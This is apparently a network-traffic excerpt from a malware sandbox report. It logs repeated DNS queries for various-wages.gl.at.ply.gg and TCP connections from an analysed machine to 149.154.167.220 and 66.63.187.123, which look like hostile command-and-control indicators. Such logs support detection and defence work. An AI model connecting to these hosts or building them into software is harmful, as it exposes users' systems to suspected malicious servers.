                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficDNS query: name: various-wages.gl.at.ply.gg
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
